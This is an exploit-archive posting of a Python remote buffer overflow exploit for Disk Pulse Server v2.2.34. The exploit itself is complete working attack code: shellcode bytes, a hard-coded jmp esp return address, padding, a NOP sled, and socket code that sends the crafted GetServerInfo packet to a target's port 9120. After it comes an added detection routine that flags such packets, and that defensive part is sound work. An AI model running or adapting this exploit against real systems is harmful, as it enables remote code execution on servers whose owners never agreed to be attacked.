
[remote exploits] - Disk Pulse Server v2.2.34 Remote Buffer

Posted on 12 October 2010

========================================================
Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
========================================================

#!/usr/bin/python
# Exploit Title: Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
# Date: 10/11/2010
# Author: xsploited security
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] gmail.com
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v2.2.34.exe
# Version: v2.2.34
# Tested on: Windows XP SP3 (Physical machine)
# CVE : N/A

# Vulnerability Information:
# A vulnerability exists in the way Disk Pulse Server v2.2.34 processes a remote client's "GetServerInfo" request.
# The vulnerability is caused due to a boundary error in libpal.dll when handling network messages and can be exploited
# to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.

# Other notes:
# It appears the vendor likes using the same server code (that was affected by my previous PoC: http://www.exploit-db.com/exploits/15231)
# for everything client/server related. It is also safe to say that the client(s) are most likely affected by bugs as well.

# Other possibly affected versions:
# Disk Pulse Server <= 1.7.x

# References:
# http://secunia.com/advisories/41748/
# http://www.exploit-db.com/exploits/15231
# http://securityreason.com/exploitalert/9247

# Shouts:
# kAoTiX, MAX, CorelanCoder, exploit-db (of course), all other security crews and sites.

import sys, socket

if len(sys.argv) != 2:
    print "[!] Usage: ./diskpulse.py <Target IP>"
    sys.exit(1)

about = "================================================= "
about += "Title: Disk Pulse Server v2.2.34 Remote BOF PoC "
about += "Author: xsploited security URL: http://www.x-sploited.com/ "
about += "Contact: xsploitedsecurity [at] gmail.com "
about += "================================================= "
print about

host = sys.argv[1]
port = 9120  # default server port

# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x8c"
        "\x8a\x10\x83\xeb\xfc\xe2\xf4\x6b\x64\x03\x10\x97\x8c\xea\x99"
        "\x72\xbd\x58\x74\x1c\xde\xba\x9b\xc5\x80\x01\x42\x83\x07\xf8"
        "\x38\x98\x3b\xc0\x36\xa6\x73\xbb\xd0\x3b\xb0\xeb\x6c\x95\xa0"
        "\xaa\xd1\x58\x81\x8b\xd7\x75\x7c\xd8\x47\x1c\xde\x9a\x9b\xd5"
        "\xb0\x8b\xc0\x1c\xcc\xf2\x95\x57\xf8\xc0\x11\x47\xdc\x01\x58"
        "\x8f\x07\xd2\x30\x96\x5f\x69\x2c\xde\x07\xbe\x9b\x96\x5a\xbb"
        "\xef\xa6\x4c\x26\xd1\x58\x81\x8b\xd7\xaf\x6c\xff\xe4\x94\xf1"
        "\x72\x2b\xea\xa8\xff\xf2\xcf\x07\xd2\x34\x96\x5f\xec\x9b\x9b"
        "\xc7\x01\x48\x8b\x8d\x59\x9b\x93\x07\x8b\xc0\x1e\xc8\xae\x34"
        "\xcc\xd7\xeb\x49\xcd\xdd\x75\xf0\xcf\xd3\xd0\x9b\x85\x67\x0c"
        "\x4d\xfd\x8d\x07\x95\x2e\x8c\x8a\x10\xc7\xe4\xbb\x9b\xf8\x0b"
        "\x75\xc5\x2c\x72\x84\x22\x7d\xe4\x2c\x85\x2a\x11\x75\xc5\xab"
        "\x8a\xf6\x1a\x17\x77\x6a\x65\x92\x37\xcd\x03\xe5\xe3\xe0\x10"
        "\xc4\x73\x5f\x73\xf6\xe0\xe9\x10")

# Begin payload buffer:
packet_header = ("\x47\x65\x74\x53\x65\x72\x76\x65\x72\x49\x6E\x66\x6F\x02")  # ASCII = "GetServerInfo."
junk = "\x41" * 256          # 256 byte junk buffer to reach eip
eip = "\xFB\xF8\xAB\x71"     # jmp esp (via ws2_32.dll)
nops = "\x90" * 12           # small nop sled

# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
packet = packet_header + junk + eip + nops + calc + nops + nops

print "[*] Connecting to " + host + "... "
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, Sending payload "
s.send(packet + " ")
print "[*] Payload sent successfully"
print "[*] Check the results "
s.close()

# Inj3ct0r.com [2010-10-12]
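The advisory above gives a defender everything needed to spot this traffic on the wire: the request header "GetServerInfo" followed by 0x02, TCP port 9120, a 256-byte filler to reach the saved return address, and a NOP sled in front of the payload. The following inspection routine is an added example written for this page (not the PoC author's code and not part of the Disk Pulse product); it classifies one TCP payload bound for the server port and flags the three traits of the crafted packet. The body-size limit, the run-length threshold and the sample messages are assumptions constructed for the example, and the PoC-shaped sample uses a placeholder return address and a block of 0xCC bytes in place of the 218-byte payload.

```python
# Port and message header as stated in the advisory above.
DISKPULSE_PORT = 9120
GETSERVERINFO_HEADER = b"GetServerInfo\x02"

# Assumed limits (not from the advisory): a GetServerInfo request carries no
# meaningful body, so anything approaching the 256-byte filler the PoC needs to
# reach the return address is suspicious, as is a long run of one byte value.
MAX_BODY_BYTES = 128
MIN_RUN_BYTES = 64


def longest_byte_run(data: bytes) -> tuple:
    """Return (byte_value, run_length) for the longest run of a single byte value."""
    best = (None, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i)
        i = j
    return best


def inspect_message(payload: bytes, dst_port: int = DISKPULSE_PORT) -> dict:
    """Classify one TCP payload sent to the Disk Pulse Server port.

    Returns {'suspicious': bool, 'reasons': [...], 'body_len': int or None}.
    Payloads that are not GetServerInfo requests are left unjudged.
    """
    result = {"suspicious": False, "reasons": [], "body_len": None}
    if dst_port != DISKPULSE_PORT or not payload.startswith(GETSERVERINFO_HEADER):
        return result
    body = payload[len(GETSERVERINFO_HEADER):]
    result["body_len"] = len(body)
    if len(body) > MAX_BODY_BYTES:
        result["reasons"].append("oversized body: %d bytes" % len(body))
    value, run = longest_byte_run(body)
    if run >= MIN_RUN_BYTES:
        result["reasons"].append("filler run: 0x%02x repeated %d times" % (value, run))
    if b"\x90" * 8 in body:
        result["reasons"].append("NOP sled (8 or more 0x90 bytes) present")
    result["suspicious"] = bool(result["reasons"])
    return result


# Constructed samples, not captured traffic. The second mirrors the PoC layout
# [header][256 x 0x41][return address][12 NOPs][payload][NOPs][NOPs], with a
# placeholder address and 218 bytes of 0xCC standing in for the payload.
BENIGN_REQUEST = GETSERVERINFO_HEADER + b"\r\n"
PLACEHOLDER_RETURN_ADDRESS = b"\xde\xad\xbe\xef"  # placeholder, not the PoC's value
POC_SHAPED_REQUEST = (GETSERVERINFO_HEADER + b"\x41" * 256 + PLACEHOLDER_RETURN_ADDRESS
                      + b"\x90" * 12 + b"\xcc" * 218 + b"\x90" * 24)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_REQUEST), ("poc-shaped", POC_SHAPED_REQUEST)):
        print(name, inspect_message(sample))
```

Run over reassembled TCP payloads (from a capture or an IDS hook), the routine reports the oversized body, the 256-byte 0x41 run and the NOP sled for the crafted packet while passing the short legitimate request; a real deployment would tune MAX_BODY_BYTES against observed Disk Pulse client traffic before alerting on it.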

